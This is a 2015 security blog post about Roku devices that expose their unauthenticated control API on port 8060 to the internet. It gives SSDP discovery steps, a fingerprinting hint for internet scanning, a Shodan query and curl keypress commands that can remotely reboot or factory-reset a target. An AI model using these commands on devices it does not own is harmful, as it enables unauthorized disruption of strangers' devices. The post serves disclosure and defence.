07/25/2015
How to Reboot or Factory-reset 1761 Internet-facing Roku Devices with a Few Curl Commands

** UPDATE 3 [7/27/2015] – Some pretty rad research by John Matherly on the Shodan blog based on some of these findings.


** UPDATE 2 [7/26/2015]: John Matherly of Shodan.io was kind enough to trigger an internet-wide scan of TCP/8060 to get a better picture of how many devices might be misconfigured to accept API commands from anyone on the internet. Should have some accurate numbers soon, but it’s currently looking like there are ~1900+ devices out there with their API ports hanging out all over the place.

After digging a little bit more: the Shodan search actually returned results for UPnP port 1900 and not 8060. Port 1900 is used by the Roku to advertise itself to other Rokus on the same network using the SSDP protocol. I don’t believe it’s possible to use that port to issue the API commands I reference to IPs with UDP/1900 open.

Also, if you want to find the IP addresses of Roku devices on the network you’re on, you’ll have to:

1. Create a file with the following in it:

M-SEARCH * HTTP/1.1
Host: 239.255.255.250:1900
Man: "ssdp:discover"
ST: roku:ecp
[leave a blank line here]

2. Feed that request to netcat while connecting to the multicast address on UDP 1900:

nc -u 239.255.255.250 1900 < ROKU_SSDP_REQUEST.txt

3. Use Wireshark to catch any responses. You should see a LOCATION response header with the IP of any Rokus in the vicinity:

HTTP/1.1 200 OK
Cache-Control: max-age=3600
ST: roku:ecp
USN: uuid:roku:ecp:[SERIALNUMBER]
Ext:
Server: Roku UPnP/1.0 MiniUPnPd/1.4
LOCATION: http://192.168.29.181:8060/
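
The three discovery steps above as one script, for inventorying the Rokus on a network you administer. This is an added example, not the author's script: the function names and the 3-second timeout are assumptions, and SAMPLE_REPLY is the response printed above.

```python
import socket
from urllib.parse import urlsplit

SSDP_ADDR = ("239.255.255.250", 1900)
M_SEARCH = (b"M-SEARCH * HTTP/1.1\r\nHost: 239.255.255.250:1900\r\n"
            b'Man: "ssdp:discover"\r\nST: roku:ecp\r\n\r\n')
# Reply shown in step 3, serial placeholder kept as printed there.
SAMPLE_REPLY = (b"HTTP/1.1 200 OK\r\nCache-Control: max-age=3600\r\n"
                b"ST: roku:ecp\r\nUSN: uuid:roku:ecp:[SERIALNUMBER]\r\nExt:\r\n"
                b"Server: Roku UPnP/1.0 MiniUPnPd/1.4\r\n"
                b"LOCATION: http://192.168.29.181:8060/\r\n\r\n")

def parse_ssdp_response(data):
    """Return ip/port/server/usn for a Roku ECP reply, or None for anything else."""
    lines = data.decode("utf-8", "replace").splitlines()
    if not lines or not lines[0].startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")  # split on the first colon only
        if sep:
            headers[name.strip().lower()] = value.strip()
    try:
        loc = urlsplit(headers.get("location", ""))
        host, port = loc.hostname, loc.port or 80
    except ValueError:  # malformed URL or port in LOCATION
        return None
    if headers.get("st") != "roku:ecp" or not host:
        return None
    return {"ip": host, "port": port, "server": headers.get("server", ""),
            "usn": headers.get("usn", "")}

def discover(timeout=3.0):
    """Send the step 1 M-SEARCH on the local segment; return the Roku replies seen."""
    found = {}
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(M_SEARCH, SSDP_ADDR)
        try:
            while True:
                device = parse_ssdp_response(sock.recvfrom(2048)[0])
                if device:  # de-duplicate repeated replies by serial
                    found[device["usn"] or device["ip"]] = device
        except socket.timeout:
            pass
    return list(found.values())

if __name__ == "__main__":
    for d in discover():
        print(f'{d["ip"]}:{d["port"]}  {d["server"]}  {d["usn"]}')
```

Each address it prints is a device whose TCP/8060 should stay reachable only from inside the LAN, so check the router for port forwards or DMZ entries pointing at it.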

It may still be possible to identify Rokus’ internet-facing TCP/8060 ports with something like masscan, where the internet IPs respond with a Server header of “Roku UPnP/1.0 MiniUPnPd/1.4”:

netcat [internet_ip] 8060

HTTP/1.1 400 Bad Request
Server: Roku UPnP/1.0 MiniUPnPd/1.4
Content-Length: 0

I wrote a simple script you can use to bounce a Roku via a bash shell. You can modify this to navigate to other functions like… “factory reset”, although that would just be MEAN.

This script basically issues “keypress” commands to the API at TCP/8060, which in turn navigate through the menus.

Example:
curl -d '' http://$TARGET:8060/keypress/home
curl -d '' http://$TARGET:8060/keypress/down
curl -d '' http://$TARGET:8060/keypress/up
curl -d '' http://$TARGET:8060/keypress/right
etc…

The Roku API keypress options are:

Home
Rev
Fwd
Play
Select
Left
Right
Down
Up
Back
InstantReplay
Info
Backspace
Search
Enter
Lit_*

You can use this as a reference to their API.

Here’s a Shodan query showing what look like Roku devices with their API ports facing the internet. *WHY* are they facing the internet? Who knows… but that’s a horrible idea.

https://www.shodan.io/search?query=ROKU

There are currently 1761 Roku API ports exposed on the internet.